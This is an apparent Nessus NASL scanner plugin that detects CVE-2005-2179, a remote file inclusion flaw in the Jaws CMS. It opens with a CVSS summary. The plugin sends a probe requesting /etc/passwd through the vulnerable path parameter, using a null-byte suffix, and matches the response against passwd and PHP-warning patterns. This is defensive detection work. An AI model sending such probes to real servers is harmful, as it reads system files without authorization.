5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.006 Low
EPSS
Percentile
78.8%
The remote host is running JAWS, a content management system written in PHP.
The remote version of Jaws allows an attacker to include URLs remotely. This may allow for the execution of arbitrary code with the privileges of the web server.
#%NASL_MIN_LEVEL 70300
#
# This script was written by Josh Zlatin-Amishav
#
# GPLv2
#
# Fixed by Tenable:
# - added CVE xref
# - added See also and Solution.
# - fixed script family.
# - changed exploit and test of its success.
# - updated plugin title, enhanced description (1/8/2009)
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
  # --- Plugin identity and vulnerability cross-references -------------------
  script_id(19395);
  script_version("1.17");
  script_cve_id("CVE-2005-2179");
  script_bugtraq_id(14158);

  script_name(english:"Jaws BlogModel.php path Parameter Remote File Inclusion");
  script_summary(english:"Detect Jaws File Inclusion Vulnerability");

  # --- Report text shown to the user ----------------------------------------
  # Multi-line values are kept exactly as the original plugin emits them.
  script_set_attribute(attribute:"synopsis", value:
"Arbitrary code may be run on the remote host." );
  script_set_attribute(attribute:"description", value:
"The remote host is running JAWS, a content management system written
in PHP.
The remote version of Jaws allows an attacker to include URLs
remotely. This may allow for the execution of arbitrary code
with the privileges of the web server." );
  script_set_attribute(attribute:"solution", value:
"Upgrade to JAWS version 0.5.3 or later." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2005/Jul/58" );

  # --- Risk scoring (CVSS v2 base + temporal) and exploit status -------------
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");

  # --- Publication / maintenance dates and plugin type ----------------------
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/07/06");
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/08/08");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  # Must follow every script_set_attribute() call above.
  script_end_attributes();

  # --- Scheduling: category, family, dependencies and preconditions ---------
  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"Copyright (C) 2005-2021 Josh Zlatin-Amishav");
  # Legacy spelling of the dependency registration call, kept as-is.
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  # Only run when a PHP-capable web server was found and CGI scanning is enabled.
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
# Locate the web server; stop early when the port is closed or cannot serve PHP.
port = get_http_port(default:80, embedded:TRUE);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);

# Response fingerprints showing that the 'path' parameter reached include():
#  - the contents of /etc/passwd were echoed back, or
#  - PHP warned that it could not open/include the supplied path. The
#    include was still attempted with attacker-controlled input (magic_quotes
#    may merely have mangled the file name), so remote URLs might still work.
fingerprints = make_list(
  "root:.*:0:[01]:",
  "Warning: main\(/etc/passwd.+failed to open stream",
  "Warning: .+ Failed opening '/etc/passwd.+for inclusion"
);

foreach dir (cgi_dirs())
{
  # The plugin's original probe string, kept verbatim.
  url = strcat(dir, "/gadgets/Blog/BlogModel.php?", "path=/etc/passwd%00");
  request = http_get(item:url, port:port);
  body = http_keepalive_send_recv(port:port, data:request, bodyonly:TRUE);

  # No answer at all: the server stopped talking to us, so give up entirely
  # rather than probing the remaining directories.
  if (body == NULL) exit(0);

  # First matching fingerprint reports the finding and ends the plugin.
  foreach fp (fingerprints)
  {
    if (egrep(string:body, pattern:fp))
    {
      security_warning(port);
      exit(0);
    }
  }
}